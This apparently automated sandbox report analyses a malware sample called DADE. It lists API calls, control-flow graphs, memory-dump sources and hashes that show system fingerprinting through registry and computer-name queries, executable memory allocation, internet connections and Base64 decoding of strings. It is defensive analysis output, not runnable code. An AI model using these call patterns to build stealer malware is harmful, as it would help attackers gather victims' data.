                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@$CrackInternetlstrlen
                                                      • String ID: <
                                                      • API String ID: 1683549937-4251816714
                                                      • Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                      • Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
                                                      • Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                      • Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2517 4228b0-4228f3 GetProcessHeap HeapAlloc RegOpenKeyExA 2518 4228f5-422905 RegQueryValueExA 2517->2518 2519 42290b-42291e RegCloseKey 2517->2519 2518->2519 2520 422920-42292f 2519->2520 2521 422931-422934 2519->2521 2520->2520 2520->2521
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                      • RegOpenKeyExA.KERNEL32(80000002,00A79FC8,00000000,00020119,00422849), ref: 004228EB
                                                      • RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                      • RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: CurrentBuildNumber
                                                      • API String ID: 3466090806-1022791448
                                                      • Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                      • Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
                                                      • Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                      • Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2522 422820-42284e GetProcessHeap HeapAlloc call 4228b0 2525 422850-422859 2522->2525 2526 42285a-422879 RegOpenKeyExA 2522->2526 2527 422892-4228a2 RegCloseKey 2526->2527 2528 42287b-42288c RegQueryValueExA 2526->2528 2528->2527
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
                                                      • HeapAlloc.KERNEL32(00000000), ref: 0042283C
                                                        • Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                        • Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                        • Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,00A79FC8,00000000,00020119,00422849), ref: 004228EB
                                                        • Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                        • Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                      • RegOpenKeyExA.KERNEL32(80000002,00A79FC8,00000000,00020119,?), ref: 00422871
                                                      • RegQueryValueExA.KERNEL32(?,00A7E4B8,00000000,00000000,00000000,000000FF), ref: 0042288C
                                                      • RegCloseKey.ADVAPI32(?), ref: 00422896
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: Windows 11
                                                      • API String ID: 3466090806-2517555085
                                                      • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                      • Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
                                                      • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                      • Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F013
                                                      • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID: ERROR
                                                      • API String ID: 3722407311-2861137601
                                                      • Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
                                                      • Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
                                                      • Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
                                                      • Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
                                                      • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocComputerNameProcess
                                                      • String ID:
                                                      • API String ID: 4203777966-0
                                                      • Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
                                                      • Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
                                                      • Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
                                                      • Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A596FE
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00A5971E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A58000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_a58000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: 1b1fce23953554cfb7f58203b59b9f975139bbc51379ade8ed28d006f94e305b
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: 48F0C231100310ABDB203BB5988CB6B76E8FF49322F100529FA42994C0DB70E8498A60
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,009D0223,?,?), ref: 009D0E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,009D0223,?,?), ref: 009D0E1E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: 73589451eedafcd612fbb6da3bed014ce118f5ec752f8284b0a0a767950f6234
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 83D0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
                                                      • Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
                                                      • Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
                                                      • Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A593E6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A58000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_a58000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 67c86e26ec07e1bfc2bf7f3d37245fd07700add9307691e5754d00714848fef0
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 3D113F79A00208EFDB01DF98C985E99BBF5BF08351F058094F9489B362D375EA54DF80
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E707C
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009E70AF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E70E9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E7110
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E711B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E7144
                                                      • lstrlen.KERNEL32(00435320), ref: 009E715E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E7180
                                                      • lstrcat.KERNEL32(00000000,00435320), ref: 009E718C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E71B7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E71E7
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 009E721C
                                                      • strtok_s.MSVCRT ref: 009E7249
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7284
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E72B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
                                                      • String ID: hSC
                                                      • API String ID: 922491270-3351665975
                                                      • Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
                                                      • Instruction ID: 069a7a6d3d8e7d30e2d213424abf14c46bb19044761b8bf77eacb22693b45531
                                                      • Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
                                                      • Instruction Fuzzy Hash: FE42D370A04345ABCB22AFB5DC88BAEBBBAEF44704F145419F801E7251DB78DD01DBA1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D6296
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D62E9
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D631C
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D634C
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D6387
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D63BA
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009D63CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------$TPC$TPC$TPC
                                                      • API String ID: 2041821634-3953685780
                                                      • Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                      • Instruction ID: baf60b3f12b47a3705eaf27af8e06d5587104c1c30c18117ab1899b61d294146
                                                      • Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                      • Instruction Fuzzy Hash: 62524F719402559FDB20AFB4DC85BAEB7BAEF89304F148426F905A7351DB78EC01CBA0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D4E16
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4E69
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4E9C
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4ECC
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4F0A
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4F3D
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009D4F4D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------$TPC$TPC$TPC
                                                      • API String ID: 2041821634-3953685780
                                                      • Opcode ID: fc918d25f8641a10a775b0c0162546dc86047189a09e5eab3f081bd063b908de
                                                      • Instruction ID: 85dee89a587c0e9754f23e1413e92dfd14bd3ec45e9a22b1520f15d6656c8a6c
                                                      • Opcode Fuzzy Hash: fc918d25f8641a10a775b0c0162546dc86047189a09e5eab3f081bd063b908de
                                                      • Instruction Fuzzy Hash: 3752717194061A9FDB10AFB4CC85BAEBBB9EF84304F158426F904AB351DB74DD42CBA0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7284
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E72B4
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E72E4
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7316
                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 009E7323
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009E732A
                                                      • StrStrA.SHLWAPI(00000000,00435350), ref: 009E7341
                                                      • lstrlen.KERNEL32(00000000), ref: 009E734C
                                                      • malloc.MSVCRT ref: 009E7356
                                                      • strncpy.MSVCRT ref: 009E7364
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E738F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E73B6
                                                      • StrStrA.SHLWAPI(00000000,00435358), ref: 009E73C9
                                                      • lstrlen.KERNEL32(00000000), ref: 009E73D4
                                                      • malloc.MSVCRT ref: 009E73DE
                                                      • strncpy.MSVCRT ref: 009E73EC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E7417
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E743E
                                                      • StrStrA.SHLWAPI(00000000,00435360), ref: 009E7451
                                                      • lstrlen.KERNEL32(00000000), ref: 009E745C
                                                      • malloc.MSVCRT ref: 009E7466
                                                      • strncpy.MSVCRT ref: 009E7474
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E749F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E74C6
                                                      • StrStrA.SHLWAPI(00000000,00435368), ref: 009E74D9
                                                      • lstrlen.KERNEL32(00000000), ref: 009E74E8
                                                      • malloc.MSVCRT ref: 009E74F2
                                                      • strncpy.MSVCRT ref: 009E7500
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E7530
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E7558
                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009E757B
                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 009E758F
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 009E75B0
                                                      • LocalFree.KERNEL32(00000000), ref: 009E75BB
                                                      • lstrlen.KERNEL32(?), ref: 009E7655
                                                      • lstrlen.KERNEL32(?), ref: 009E7668
                                                      • lstrlen.KERNEL32(?), ref: 009E767B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                                      • String ID: hSC
                                                      • API String ID: 2413810636-3351665975
                                                      • Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
